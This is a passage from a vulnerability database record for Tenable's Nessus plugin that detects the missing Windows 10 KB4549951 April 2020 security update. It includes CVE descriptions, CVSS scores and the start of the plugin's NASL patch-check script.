audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:10:06", "description": "The remote Windows host is missing security update 4549951.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0939, CVE-2020-0945, CVE-2020-0946, CVE-2020-0947)\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A security feature bypass vulnerability exists when Windows fails to properly handle token relationships. An attacker who successfully exploited the vulnerability could allow an application with a certain integrity level to execute code at a different integrity level, leading to a sandbox escape. The update addresses the vulnerability by correcting how Windows handles token relationships (CVE-2020-0981)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory. An attacker who successfully exploited these vulnerabilities could gain elevated privileges on a target operating system. This vulnerability by itself does not allow arbitrary code to be run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (e.g. a remote code execution vulnerability and another elevation of privilege) that could take advantage of the elevated privileges when running. The update addresses the vulnerabilities by correcting how Windows Hyper-V handles objects in memory. (CVE-2020-0917, CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969, CVE-2020-0970)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4549951: Windows 10 Version 1903 and Windows 10 Version 1909 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0910", "CVE-2020-0913", "CVE-2020-0917", "CVE-2020-0918", "CVE-2020-0934", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0939", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0947", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0981", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4549951.NASL", "href": "https://www.tenable.com/plugins/nessus/135464", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135464);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0699\",\n \"CVE-2020-0784\",\n \"CVE-2020-0794\",\n \"CVE-2020-0821\",\n \"CVE-2020-0888\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0910\",\n \"CVE-2020-0913\",\n \"CVE-2020-0917\",\n \"CVE-2020-0918\",\n \"CVE-2020-0934\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0939\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0944\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0947\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0970\",\n \"CVE-2020-0981\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0996\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1001\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1029\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4549951\");\n script_xref(name:\"MSFT\", value:\"MS20-4549951\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4549951: Windows 10 Version 1903 and Windows 10 Version 1909 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4549951.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0939, CVE-2020-0945, CVE-2020-0946,\n CVE-2020-0947)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2020-0910)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A security feature bypass vulnerability exists when\n Windows fails to properly handle token relationships. An\n attacker who successfully exploited the vulnerability\n could allow an application with a certain integrity\n level to execute code at a different integrity level,\n leading to a sandbox escape. The update addresses the\n vulnerability by correcting how Windows handles token\n relationships (CVE-2020-0981)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n handle objects in memory. An attacker who successfully\n exploited these vulnerabilities could gain elevated\n privileges on a target operating system. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, this vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerabilities by correcting how Windows Hyper-V\n handles objects in memory. (CVE-2020-0917,\n CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969, \n CVE-2020-0970)\");\n # https://support.microsoft.com/en-us/help/4549951/windows-10-update-kb4549951\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?084a5389\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4549951.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4549951');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, 